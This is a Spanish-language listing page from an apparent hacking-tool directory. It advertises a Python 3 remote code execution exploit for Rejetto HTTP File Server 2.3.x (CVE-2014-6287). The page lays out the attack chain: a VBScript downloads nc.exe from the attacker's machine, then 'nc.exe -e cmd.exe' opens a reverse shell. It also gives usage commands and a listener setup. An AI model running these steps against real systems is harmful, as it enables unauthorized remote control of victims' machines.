Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
rejjeto_hfs-rce-exploit-cve-2014-6287 — Exploit de Ejecución Remota de Comandos para Rejetto HTTP File Server 2.3.x (CVE-2014-6287) reescrito en Python 3 para pruebas modernas de seguridad ofensiva. | Kitploit
Herramientas/GitHubGitHub/joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónHerramienta de Acceso Remoto

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287

rejjeto_hfs-rce-exploit-cve-2014-6287

Exploit de Ejecución Remota de Comandos para Rejetto HTTP File Server 2.3.x (CVE-2014-6287) reescrito en Python 3 para pruebas modernas de seguridad ofensiva.

Ver Repositorio
hace 8 mesesAún no revisado

Exploit de Ejecución Remota de Comandos en HFS (CVE-2014-6287)

Esta es una reescritura en Python 3 del clásico exploit de Ejecución Remota de Comandos (RCE) dirigido a Rejetto HTTP File Server (HFS) v2.3.x, aprovechando la vulnerabilidad identificada como CVE-2014-6287.

Descubierto originalmente por Avinash Kumar Thapa, también conocido como "-Acid", esta versión mejora la portabilidad y la usabilidad, ofreciendo parametrización completa y compatibilidad moderna.


⚠️ Descargo de responsabilidad

Esta herramienta se proporciona exclusivamente con fines educativos y de pruebas de penetración autorizadas. El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito para probar es ilegal y poco ético.


📌 Detalles del exploit

  • Vulnerabilidad: Rejetto HFS v2.3.x - Ejecución remota de comandos
  • CVE: CVE-2014-6287
  • Impacto: Ejecución remota de código con privilegios del sistema
  • Requisito: El objetivo debe estar ejecutando una versión vulnerable de HFS con scripting habilitado.

🚀 Características

  • Totalmente compatible con Python 3
  • Acepta todos los parámetros clave mediante CLI:
    • IP y puerto del objetivo
    • IP local (atacante)
    • Puerto de escucha para la shell inversa
    • Puerto utilizado para alojar nc.exe
  • Sin valores hardcodeados
  • Entrega clásica de shell inversa con nc.exe mediante VBScript
  • Flujo del exploit:
    1. Subir un VBScript para descargar nc.exe
    2. Ejecutar el VBScript en el objetivo
    3. Ejecutar nc.exe -e cmd.exe para establecer una shell inversa

🛠️ Uso

root@kitploit:~
python3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>

Example:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000

Requirements:
  - HTTP server serving nc.exe:
      python3 -m http.server 8000
  - Listener:
      nc -lvnp 4444
Descargar herramienta